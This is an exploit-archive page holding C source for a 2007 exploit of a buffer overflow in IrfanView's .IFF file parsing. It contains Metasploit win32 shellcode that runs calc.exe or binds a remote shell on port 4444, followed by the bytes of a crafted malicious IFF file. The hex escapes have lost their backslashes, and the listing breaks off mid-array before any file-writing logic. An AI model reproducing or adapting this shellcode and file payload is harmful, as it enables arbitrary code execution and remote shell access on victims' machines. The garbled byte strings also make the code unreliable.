IrfanView <= 4.00 .IFF File Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : IrfanView <= 4.00 .IFF File Buffer Overflow Exploit
# Published : 2007-04-27
# Author : Marsu
# Previous Title : East Wind Software (advdaudio.ocx 1.5.1.1) Local BoF Exploit
# Next Title : Winamp <= 5.34 .MP4 File Code Execution Exploit
/******************************************************************************
*                                                                             *
*                IrfanView <= 4.00 .IFF File Buffer Overflow                  *
*                                                                             *
*                                                                             *
* IrfanView is vulnerable to an unspecified buffer overflow when processing a *
* crafted .IFF file.                                                          *
* This exploit runs calc.exe or binds shell to port 4444.                     *
*                                                                             *
* Tested against Win XP SP2 FR.                                               *
* Have Fun!                                                                   *
*                                                                             *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>                  *
******************************************************************************/

#include "stdio.h"
#include "stdlib.h"

/* win32_exec -  EXITFUNC=process CMD=calc.exe Size=138 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"xfcxe8x44x00x00x00x8bx45x3cx8bx7cx05x78x01xefx8b"
"x4fx18x8bx5fx20x01xebx49x8bx34x8bx01xeex31xc0x99"
"xacx84xc0x74x07xc1xcax0dx01xc2xebxf4x3bx54x24x04"
"x75xe5x8bx5fx24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb"
"x8bx1cx8bx01xebx89x5cx24x04xc3x31xc0x64x8bx40x30"
"x85xc0x78x0cx8bx40x0cx8bx70x1cxadx8bx68x08xebx09"
"x8bx80xb0x00x00x00x8bx68x3cx5fx31xf6x60x56x89xf8"
"x83xc0x7bx50x68x7exd8xe2x73x68x98xfex8ax0ex57xff"
"xe7x63x61x6cx63x2ex65x78x65x00";


/* win32_bind -  EXITFUNC=process LPORT=4444 Size=317 Encoder=None http://metasploit.com */
unsigned char BindShellcode[] =
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45"
"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49"
"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d"
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66"
"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61"
"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40"
"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32"
"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6"
"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09"
"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0"
"x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff"
"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53"
"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff"
"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64"
"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89"
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab"
"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51"
"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53"
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6"
"x52xffxd0x68x7exd8xe2x73x53xffxd6xffxd0";



char iff_file_part1[] =
"x46x4fx52x4dx00x01x0bx7ex49x4cx42x4dx42x4dx48x44"
"x00x00x00x14x01xfdx01xb6x00x00x00x00x08x00x01x00"
"x00x00xc7xc7x01xfdx01xb6x43x4dx41x50x00x00x0cx00"
"x1bx1bx19xffxffxffxbcxd7xeaxefx64x2ex73xa9xd2xd9"
"xd9xd9x13x6exb6x00x68xb4x70x70x70xf0x92x6cx2excc"
"xccxfaxf2xe6x99x99x99x50x94xc5xf1xe9xe6xf7xadx32"
"xacxb4xb4x4dx4bx48xf0xc9xb4xabx85x38xe0xe9xefxec"
"xe5xdexefxb4x98x2ex80xbcxe5x98x3ax8cx8cx8cxefxe0"
"xd3xa6xc4xd9x33x33x33x8cxb6xd5xc6xd5xddxfaxf7xf3"
"xfex01x02x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x92x09x45x92x09x4ex12x23x88x02x00x24x12"
"x21x74x00x00x02x92x41x90xfdx90x00x91x10x05x12x20"
"x1cx00x00x00x12x20xecx91xeex18x92x09x70x98xe4xc0"
"x92x3ex6fx92x3ex62x00x02x08x12x24x2cx12x24x04x92"
"x09x45x92x09x4ex12x23xd8x02x00x24x12x21xc4x00x00"
"x02x92x41x90xfdx90x00x91x10x05x12x20x6cx00x00x00"
"x12x21x3cx91xeex18x92x09x70x98xe4xc0xecx3ex6fx92"
"x3ex62x00x02x08x12x24x7cx12x24x54x12x20xe8xafx00"
"x00x92x07x32x00x00x51xafx15xb8xafx00x00x3fxa0x50"
"x12x20xc0x00x00x18x12x23x04x91xeex18x92x07x38xff"
"xffxffx92x07x32x92x06xabx92x06xebx12x23xc8x00x02"
"x80x00x00x00x92x06xabx92x06xebx58x90x08x00x00xb4"
"x00x04x38x00x00x00x00x05x00x00x21xc6x00x00x00xfd"
"xfcx64x92x09x45x92x09x4ex00x65x68x12x20xa8x12x24"
"x54x12x23xe8x91xeex18x12x24x7cx00x00x08x12x23xf8"
"x92x40x2ex15x20xa8x12x21xd0x92x09x70x98xe4xc0x92"
"x40xefx92x40xbbx00x00x00xfdxfcx00x00x80x01x57x00"
"xd0x00x00x36x12x21x70x44x00x5cx00x00x00x0ax00x08"
"x92x3ex88x00x02x1ax00x00x00x92x06xabxe2x00x00x12"
"x24x7cx00x00x64x00x00x00x00x00x10x6fx00x5ax66x00"
"x64xfdxfcx00x12x21xd0x00x00x02x15x20xa0x00x00x7a"
"x58x90x08x44x00x5cx63x00x6fx6dx00x75x6ex00x65x73"
"x00x74x61x00x20x64x00x6ex53x00x20x74x00x65x69x00"
"x74x67x00x6ex00x00x10x12x22x38xafx00x00x92x07x32"
"x00x00x03xafx07x18xafx00x00x45xa6x50x12x22x10x64"
"x00x5cx12x24x54x91xeex18x92x07x38xffxffxffx92x07"
"x32x92x06xabx92x06xebx96x86x20x00x00x0cx00x00x00"
"xafx00x00x12x22x64x00x00x00x92x05xc8x49x7bxc8x12"
"x23x30x92x05x51xafx0bx08x92x05x6dx49x7bxd0x49x7b"
"xd0x49x7bxd4x58x90x00xafx01x78x12x23x30x58x90x08"
"x00x00x00x80x18x98x00x00x00x57x00xd0x12x25x0cx5a"
"x0fx70x12x22xdcx00x00x00x00x01x00x28x54x28x12x25"
"x0cx00x00x09x46x49x47xfdx61x39xd5x01xb6x1bx1bx00"
"xffxffxffxefxeaxd7xa9x73x2exd9xd9xd9x00xb6x6ex70"
"x70xb4x6cx92xf0xfaxccxccx99x99xe6xc5x94x50xf7xe6"
"xe9xb4xacx32x48x4bx4dxabxb4xc9xe9xe0x38xdexe5xec"
"x43x41x4dx47x00x00x00x04x00x00x00x00x42x4fx44x59"
"x00x01x08x42xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xdcx00"
"x00x04xe7x00xdcx00x00x04xe7x00xdcx00x00x04xe7x00"
"xdcx00x00x04xe7x00xc1x00xc1x00xc1x00xeaxffx00xef"
"xf7xffx03xfbxefx3fx78xe8xffx00xf8xdfx00x03x04x10"
"x40x41xe7x00xebx00x00xc0xf4x00x01x41x56xe7x00xdf"
"x00x03x04x30x40xc7xe7x00xeax00x00x18xf7x00x03x03"
"xe0x80x5exe7x00xc1x00xc1x00xc1x00xebxffx01x7fxe7"
"xf7xffx03xfcxa7x7ex72xe8xffx00xf8xddx00x01x01x64"
"xe7x00xdfx00x00x01xffx00x01x60x80xe8x00xebx00x00"
"x80xf6x00x03x05xc8x81x6exe7x00xebx00x01x40x10xf7"
"x00x03x04xa0x40x72xe7x00xc1x00xc1x00xc1x00xebxff"
"x01x3fx87xffxffx00xddxfcxffx05xefxf7xffxe7x9ex66"
"xe8xffx00xf8xeax00x04x60x00xa0x22x01xfex00x07x20"
"x50x08x00x10x01x09x80xe8x00xecx00x05x01x20x69x80"
"xe0x63xffx03x04x01x80x60x70x18xfex00x01xa8x80xe8"
"x00xeax00x04x68x00xa0x22x01xfex00x07x20x50x08x04"
"x14xa1x89x80xe8x00xecx00x05x01x00x18x80xa0x40xff"
"x01x09x00x80x20x40x00x06x04x80xa0x80xe8x00xc1x00"
"xc1x00xc1x00xecxffx10xfex3fx81x7ex4dx97x38x73xb9"
"xfax4fx2fxd3xffxf1x0ex67xe8xffx00xf8xeax00x00x04"
"xffx02x00x08xffx00x08x40x00x01x00x02x00x0ax01x60"
"xe7x00xebx00x0fx02x4axa2xa0x48xc3x04x02x20xa1x54"
"x2ax00x02x20xf0xe7x00xecx00x10x01xc0xcex83xb2xc8"
"xc7x0cx42x00xa1xd0x6ex04x0axf1xf8xe7x00xebx00x05"
"x23xfbxc2xe1xe7x83xffx87x07xc7xf1x78x7ax06x00x20"
"xf0xe7x00xc1x00xc1x00xc1x00xecxffx10xfcx9exe1x9f"
"xccx73x30x7axb1x59x4exf9x19xffxf9x26x63xe8xffx00"
"xf8xecx00x0cx02x40x01x00x22x11x82x07x01x80xc2x22"
"x31xffx00x01x21x52xe7x00xecx00x02x02xd2x45xffx90"
"x0bx5bx42x03x21x90x4bx76x1bx00x04x28xc2xe7x00xec"
"x00x0cx02x40x05x40x32x9dxe2x07x81xc0xc3x2exb7xff"
"x04x01xe9xd6xe7x00xebx00x0bx02x97x83x18x5bx69x9a"
"x8bx45x6bxacx13xffx06x01x20xc2xe7x00xc1x00xc1x00"
"xc1x00xecxffx0cxfdxcex63xd9xf2xefx81xcfxf3xf9xf7"
"xffx3exffxffx01x22x78xe8xffx00xf8xeax00x06x84x00"
"x14x00x5ax00x30xffx00x01x02x40xffx00x01x11x41xe7"
"x00xebx00x0bx02x00x06x12x80x72x30x78x01x00x07x41"
"xfex00x00xcfxe7x00xecx00x09x02x30x84x26x14x10x7a"
"x30x38x20xffx02x04x41x04x02xd1xc7xe7x00xecx00x0a"
"x01x02x10x12x10x08x20x10x7cx34x1bxffx02xffx06x01"
"x04xcexe7x00xc1x00xc1x00xc1x00xecxffx10xfcxc6xe7"
"xcfxf2xe7xc8xffxf7xc9xfcxfex7cxffxfdx33x7exe8xff"
"x00xf8xecx00x06x04x08x00x20x00x80x10xf8x00x01x40"
"x80xe8x00xecx00x0bx05x2bx88x00x03x98x01x00x10x32"
"x02x01xffx00x03x02x03xc1x80xe8x00xecx00x0ax05x29"
"x08x22x0dx98x15x10x00x32x0axffx01x04x04x02xc0xc1"
"x80xe8x00xecx00x11x05xe3x18x06x01x9fxc0x30x07xf6"
"x1bx00x7cx06x04x08xc3x80xe8x00xc1x00x0fx00xc1x00"
"xecxffx11xfcx0exe7xcfxf2xe8x3cxffxe0x39xfcxfex02"
"xffxf9x38x7ex7fxe9xffx00xf8xe9x00x06x20x00x87xd0"
"x00x17xc0xffx00x04x7dx00x0ax00x40xe7x00xecx00x06"
"x03xf3x88x00x03x90x32xffx00x08x32x02x01x83x00x08"
"x04xc1x80xe8x00xecx00x11x07xf9x08x22x0dx9fxd2x90"
"x17xc2x0ax01xfdx04x0axc4xc1x80xe8x00xecx00x10x06"
"x19x18x06x01x98x10xb0x00x16x1bx00x80x06x08x01xc1"
"xe7x00xc1x00xc1x00xc1x00xecxffx0cxf9xe6xe3xd9xf2"
"xefxdex4fxf3xd9xfcxffx7dxffxffx02x3ex4ex7fxe9xff"
"x00xf8xecx00x08x08x14x04x00x14x80x01x00x30xfex00"
"x00x41xe3x00xecx00x0cx08x07x80x06x13x80x40x20x78"
"x12x01x05x43xfex00x00x90xe7x00xecx00x11x08x15x04"
"x26x15x90x01x20x38x02x0bx00x43x04x00xc2x91x80xe8"
"x00xecx00x10x0ax07x10x12x11x88x20x00x3cx26x19x00"
"x41x06x0cx02xa0xe7x00xc1x00xc1x00xc1x00xecxffx11"
"xfbxf4xe1x9fx44xe3x30x73xb1x89xfexb1x14xfcx07x3e"
"x44x7fxe9xffx00xf8xebx00x10x02x01x00xe2x91x02x06"
"x01x10x02x62x39x01x80x00x04x80xe8x00xecx00x10x04"
"x0ax85x90x50x9bx06x8bx21x80x03x36x53x02x34x00x0c"
"xe7x00xecx00x11x0cx0ex05x40xfax9dx27x8ex81x50x0b"
"x6exfbx07xb0xc1x0cx80xe8x00xecx00xffx0cx0ex17x13"
"x50x8bxa8x9ax8bx04x1bxa4x56x06x54x00x26xe7x00xc1"
"x00xc1x00xc1x00xecxffx10xfbxf5xe1x7ex4dxf7x32xf3"
"xb9x7bxe7x3fxd3xf8x07xffxe0xe8xffx00xf8xebx00x01"
"x02x04xffx02x0bx88x08x00x40x00x01x00x02x00x08x00"
"x40xe7x00xebx00x0fx02x82xa2xa0x88xc5x84x02xa0x09"
"x44x2ax03xe8x00x45xe7x00xebx00x0fx02x0ex83xb2x88"
"xcdx0cx42x80x19xc0x6ex03xf8xc0xc5xe7x00xecx00x04"
"x0cx0dx93xe2"
;

char iff_file_part2[] = 
"xe1xffx87x09x07x87xc6x01x78x7ax07xe0xc0xd4xe7x00"
"xc1x00xc1x00xc1x00xe9xffx08x7fxffxfdxffxfexffx7f"
"xffxefxfdxffx00xf9xe8xffx00xf8xecx00x00x08xffx00"
"x0dx80xa0x02x00x01x00x80x00x50x28x01x80x00x0exe7"
"x00xecx00x10x08x00x01x80xe0x03x02x03x01x80x00x70"
"x38x01x80x00x0axe7x00xecx00x00x08xffx00x0dx80xa0"
"x02x00x01x00x80x00x50x28x01x80x00x0exe7x00xecx00"
"x00x08xfex00x00xa0xfbx00x05x40x28x01x80x00x08xe7"
"x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00"
"xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2"
"xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00"
"xefxc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2"
"xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc2xffx00xf8xc1x41xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00"
"xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2"
"xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00xf8xc1"
"x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc2xffx00"
"xf8xc1x00xc1x4fxc1x00xc1x00xc1x00xc1x00xc1x00xc2"
"xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1"
"x00xc1x00xc1x00xc1x00xe7xffx01xfex3fxffxffx01xfe"
"x7fxffxffx01xfex73xe6xffx00xf8xe7x00x00x01xf9x00"
"x00x84xe5x00xe7x00x00x01xdcx00xe7x00x01x01x80xfe"
"x00x00x80xfex00x00x8cxe5x00xe6x00x00x40xffx00x00"
"x01xfex00x00x01xe4x00xc1x00xc1x00xc1x00xe7xffx01"
"xfex3fxffxffx00xfexfexffx00xfexe5xffx00xf8xe7x00"
"x00x01xdcx00xe3x00x00x01xe0x00xe7x00x01x01x40xff"
"x00x00x01xfdx00x00x80xe5x00xe3x00x01x01x80xfex00"
"x00x8cxe5x00xc1x00xc1x00xc1x00xe3xffx01xfex7fxff"
"xffx01xfex73xe6xffx00xf8xe6x00x00x40xddx00xe6x00"
"x00xc0xffx00x00x02xfex00x01x01x80xe5x00xe6x00x00"
"x40xfbx00x01x01x80xe5x00xe6x00x00x40xffx00x01x02"
"x80xffx00x01x01x08xe5x00xc1x00xc1x00xc1x00xeaxff"
"x0cxfex78xffx8fx7cx7fx9fxfcx7dxe3xfcx7ex7bxe6xff"
"x00xf8xeax00x01x09x40xffx10x00xd2xfex00x03x80x12"
"x00x44xe4x00xeax00x0cx0cxc2x30xe0xdaxc0xf0x00x97"
"x0ax01x47x4axe5x00xeax00x0cx09xc2x10x70xd2x80x60"
"x00x82x1ax01x45x80xe5x00xeax00x0bx0cx45x10x00x51"
"x40x00x02x01x06x02xc5xe4x00xc1x00xc1x00xc1x00xea"
"xffx0cxf0xa0x0ex03x20x1ex07xfexe4xc0xf0x18x79xe6"
"xffx00xf8xeax00x02x08x40x12xfcx00x03x01x00x08x04"
"xe4x00xeax00x0bx05x47xa2x78x8bx80x60x01x12x7dx07"
"x82xe4x00xeax00x0bx0fx47xb3x78x8bx81x68x03x1bx3d"
"x0fx86xe4x00xeax00x0cx05x97xe2x7cxdfxa0x60x03x16"
"x3cx07xa2x42xe5x00xc1x00xc1x00xc1x00xeaxffx0cxf1"
"xcfx0exf1x21x8cx73xfdxe7x2cx73xccxbbxe6xffx00xf8"
"xeax00x06x09x24x10x12x00x10x80xffx00x03x90x02x16"
"x40xe5x00xeax00x0cx03x04x81x92x04x50x18x00x04x92"
"x12x07x44xe5x00xeax00x0cx0bx2cx91x1ax04x52x8cx02"
"x00x92x06x57xc6xe5x00xeax00x0cx03x0cx03x10x56x00"
"x08x01x00x20x82x45x86xe5x00xc1x00xc1x00xc1x00xea"
"xffx0cxf1xcfx99xfbx23xc9xf9xfexe7x3fx7fxcex7dxe6"
"xffx00xf8xeax00x06x08x00x01x04x00x04x0axfex00x00"
"x40xe3x00xe9x00x05x20x15x04x00x01x08xffx00xffx40"
"x01x11x80xe5x00xeax00x0cx08x30x45x04x00x04x0ax01"
"x08xc1x40x31x82xe5x00xeax00x0cx02x20x01x00x54x11"
"x08x02x00x41x58x11x04xe5x00xc1x00xc1x00xc1x00xea"
"xffx0cxf3xdfxcdxffx23xdcx03xfdxe7x3ex27xeexfdxe6"
"xffx00xf8xeax00x04x08x00x10x00x04xfdx00x01x01x40"
"xe3x00xeax00x0bx02x50x40x00x04x20x00x02x08x41x00"
"x29xe4x00xeax00x0cx08x00x12x00x04x35xfax03x08x41"
"x40x01x82xe5x00xe8x00x05x04x00x50x34x02x03xffx00"
"x02x08x01x84xe5x00xc1x00xc1x00xc1x00xeaxffx0cxf3"
"x8fx89xffx27xd9x05xfdxe7x3fx27xc6xfdxe6xffx00xf8"
"xeax00x00x08xffx50xfex00x00x02xfex00xffx28xe4x00"
"xeax00x02x02x10x46xffx00x02x22x00x02xffx00x01x20"
"x21xe4x00xeax00x02x08x50x56xffx00x02x37xfex03xff"
"x00x02x28x29x82xe5x00xeax00x0cx02x00x04x00x50x33"
"x04x03x08x40x60x01x84xe5x00xc1x00xc1x00xc1x00xea"
"xffx00xf3xffx8fx09xffx27xddxffxfdxe7x7fx27xcexfd"
"xe6xffx00xf8xeax00x00x08xffx50xfax00x01x40x20xe4"
"x00xeax00x01x02x40xfex00x06x22x00x02x00x81x00x09"
"xe4x00xeax00x00x08xffx50xffx00x07x36x00x03x00xc0"
"x40x21x82xe5x00xeax00x0cx02x00x06x00x50x36x00x03"
"x08xc1x08x09x84xe5x00xc1x00xc1x00xc1x00xeaxffx0c"
"xf3xefxd8xfbx27xdcxf1xfdxe7xbex67xfexf9xe6xffx00"
"xf8xeax00x03x08x00x01x02xffx00x00x02xffx00x00x20"
"xe2x00xeax00x00x02xffx10x09x02x00x24x06x02x00x20"
"x88x01x06xe5x00xeax00x0cx08x10x01x02x00x30x06x03"
"x00xa1x98x01x86xe5x00xeax00x0cx02x30x44x06x50x35"
"x0cx03x08xa0x88x31x84xe5x00xc1x00xc1x00xc1x00xea"
"xffx0cxf3xeax8cx49x27xdex37xfexe7xccx75x5exf9xe6"
"xffx00xf8xeax00x03x08x07x10x22xffx00x00x40xffx00"
"x03x18x93x80x08xe5x00xeax00x03x02x22x00xe2xffx00"
"x00xe0xffx00x03x2cx19x10x08xe5x00xeax00x0cx08x07"
"x12xa2x00x12xd4x01x00x3ax9bx80x88xe5x00xeax00x0c"
"x02x2ax80x58x50x12x34x02x08x68x1dx50x8axe5x00xc1"
"x00xc1x00xc1x00xeaxffx0cxfdxe8x7ex03xafxcex07xfd"
"xf7xc0xf8x7ex7bxe6xffx00xf8xeax00x04x02x10x00x04"
"x50xfex00x02x08x01x08xe3x00xeax00x06x0ax13x51xf4"
"x00x01xd0xffx00x03x1ex0bxa0x0axe5x00xeax00x0bx02"
"x13x81xfcx50x21xd0x02x08x3fx0fx81xe4x00xeax00x0c"
"x04x0bx60xf0x88x10xd8x01x10x1ex0bxe0x80xe5x00xc1"
"x00xc1x00xc1x00xe9xffx00xf8xfcxffx00xfcxffxffx02"
"xfcx7fxf3xe6xffx00xf8xe9x00x02x07x00x10xfcx00x03"
"x10x03x80x02xe5x00xe9x00x02x05x00x70xffx00x00x60"
"xffx00x03x1cx02x80x0axe5x00xe9x00x02x07x00x10xfc"
"x00x03x10x03x80x0axe5x00xe7x00x00x10xfex00x02x02"
"x00x14xffx00x00x02xe5x00xc1x00xc1x00xc1x00xe3xff"
"x00xfexe1xffx00xf8xc1x00xe3x00x01x02x80xe1x00xc1"
"x00xdex00x00x0cxe5x00xc1x00xc1x00xc1x00xe3xffx00"
"xfexfdxffx00xf3xe6xffx00xf8xc1x00xe3x00x00x01xfd"
"x00x00x10xe5x00xe3x00x01x01x80xe1x00xe3x00x01x01"
"x80xfex00x00x04xe5x00xc1x00xc1x00xc1x00xe3xffx01"
"xfex7fxfexffx00xf7xe6xffx00xf8xe3x00x01x01x80xfe"
"x00x00x04xe5x00xdex00x00x14xe5x00xe3x00x01x01x80"
"xfex00x00x04xe5x00xdex00x00x1cxe5x00xc1x00xc1x00"
"xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc2xffx00xf8xc1x00xc1x00xc1x00"
"xc1x00xc1x00xc1x00xc1x00xe7xffx00xdfxddxffx00xf8"
"xe7x00x01x10x04xddx00xe7x00x01x30x04xddx00xe7x00"
"x01x10x04xddx00xe7x00x01x30x04xddx00xc1x00xc1x00"
"xc1x00xe8xffx06xfexefxd9xf6xbexfdxf8xe2xffx00xf8"
"xe7x00x06x60x0cx28x43x08x00x80xe2x00xe8x00x07x01"
"xf0x3ex31x80x06x07x80xe2x00xe7x00x06x80x10x30x82"
"x0cx00x80xe2x00xe8x00x07x01xf0x3ax31x02x0ex03x80"
"xe2x00xc1x00xc1x00xc1x00xe8xffx07xfexdfx1dxbfxfb"
"x2cx7ax7fxe3xffx00xf8xe8x00x07x01x80x3cx39xc7x0e"
"x02xb0xe2x00xe8x00x07x03xe0xfex78xc3xdfx87xd0xe2"
"x00xe8x00x03x02x40x00x01xffx00x01x02x70xe2x00xe8"
"x00x07x02xe0x82x69x40x50x86x30xe2x00xc1x00xc1x00"
"xc1x00xe8xffx07xfcxfdxfbx7fxffx9bxdfx3fxe3xffx00"
"xf8xe7x00x06x02xf0xf9x81xe7xa0xb6xe2x00xe8x00x07"
"x03x01xfcx70xc3xcfxc0x7axe2x00xe7x00x06x01x08x09"
"x42x08x40x0exe2x00xe8x00x07x03x00x1cx49x00x08x00"
"x36xe2x00xc1x00xc1x00xc1x00xe9xffx00xfexffxffx05"
"xfex4fxffx6fxfbxe5xe3xffx00xf8xe9x00x02x01x40x1f"
"xffxf1x03x81xe3xf0x14xe2x00xe8x00x07x80x17xd0xe0"
"xc0xf1xfcx0exe2x00xe8x00x06xc0x18x30x01x41x02x08"
"xe1x00xe8x00x02x40x1cx70xffx01x02x03x1cx06xe2x00"
"xc1x00xc1x00xc1x00xe9xffx09xf1x3fx8fx7fxdfxffx73"
"x58xffxe7xe4xffx00xf8xe9x00x09x0bx00x1ex83xc1x80"
"x3cxbdx00x10xe3x00xe9x00x09x07xc0x7fx01xe0xc0xf8"
"x7ex00x08xe3x00xe7x00x02x01x02x01xfex40xe1x00xe9"
"x00x00x01xffx40x03x02x61x00x80xffx00x00x08xe3x00"
"xc1x00xc1x00xc1x00xe9xffx03xddxfexb1xfbxffxffx03"
"xedxdfxbfxe6xe4xffx00xf8xe9x00x09x3ax01x78x03x41"
"x80x3dx0fx40x0dxe3x00xe9x00x03x1cx00xfex07xffxc0"
"x03x1fx3fx80x1exe3x00xe9x00x09x04x00x80x00xc1x40"
"x21x10x80x02xe3x00xe9x00x09x18x00x02x00x41x00x21"
"x38x00x06xe3x00xc1x00xc1x00xc1x00xe9xffx00xdfxff"
"xffx00xfexffxffx01xeexffxffxf7xe4xffx00xf8xe9x00"
"x0ax18x05xe8x06x01x80x07x85xe0x01xa0xe4x00xe9x00"
"x0ax28x03xf8x0fx00xc0x1fx03xf8x0fxe0xe4x00xe9x00"
"x0ax18x06x18x08x01x40x08x86x10x06x60xe4x00xe9x00"
"x0ax38x04x38x00x01x00x10x84x38x0dxe0xe4x00xc1x00"
"xc1x00xc1x00xeaxffx04xefxffxdfxbfxdfxffxffx03xfd"
"x9ex31xfexe4xffx00xf8xeax00x0bx04x00x0fx40x0cx01"
"x80x07x81x7ax00xa0xe4x00xeax00x0bx18x00x3fx80x3e"
"x00xc0x03xe0xfcx01x60xe4x00xeax00x07x0cx00x10x80"
"x12x01x40x04xfex00x00xe0xe4x00xeax00x0bx1cx00x38"
"x00x22x01x00x04x20x00x01xa0xe4x00xc1x00xc1x00xc1"
"x00xeaxffx04x6bxffx18xffxbfxffxffx02xfdxdfxbfxff"
"xffx00x7fxe6xffx00xf8xeax00x0cx5cx00xbcx00x3cx01"
"x80x00xf0x1exc0x00x80xe5x00xeax00x0bxb8x00x7fx00"
"x78x00xc0x03xe0x7fx40x01xe4x00xeax00x00x60xfex00"
"x07x04x01x40x01x10x21xc0x01xe4x00xeax00x0bxc8x00"
"x01x00x64x01x00x02x10x70xc0x01xe4x00xc1x00xc1x00"
"xc1x00xebxffx05xfdx6fxfdxfbxffx27xfexffx04xb3xff"
"xefxfexefxe6xffx00xf8xeax00x0cxc0x02xf0x00xf8x01"
"x80x00xf0x0bxc0x00xd0xe5x00xebx00x0dx03xf0x01xfc"
"x00x70x00xc0x00x7cx07xf0x01xe0xe5x00xebx00x03x01"
"x20x01x08xffx00x07x01x40x00x80x0cx20x00x20xe5x00"
"xebx00x03x02x70x00x1cxffx00x00x01xffx00x04x84x08"
"x70x00xc0xe5x00xc1x00xc1x00xc1x00xebxffx02xfdx7f"
"xefxffxffx00xefxfexffx04xbbxfcx7bxffx93xe6xffx00"
"xf8xeax00x0cx80x07xb0x01xe0x01x80x00x1ex00xf4x00"
"x5axe5x00xebx00x0dx03x00x1fxd0x00xf0x00xc0x00x7c"
"x03xf8x00x3exe5x00xebx00x0dx01x00x08x70x01x00x01"
"x40x00x22x00x08x00x02xe5x00xebx00x06x03x00x1cx30"
"x01x30x01xffx00x01x42x02xffx00x00x12xe5x00xc1x00"
"xc1x00xc1x00xebxffx05x7fxffx8ex7fxffxdfxfexffx00"
"xf6xffx7fx01xffxf7xe6xffx00xf8xebx00x0dxc0x00x1e"
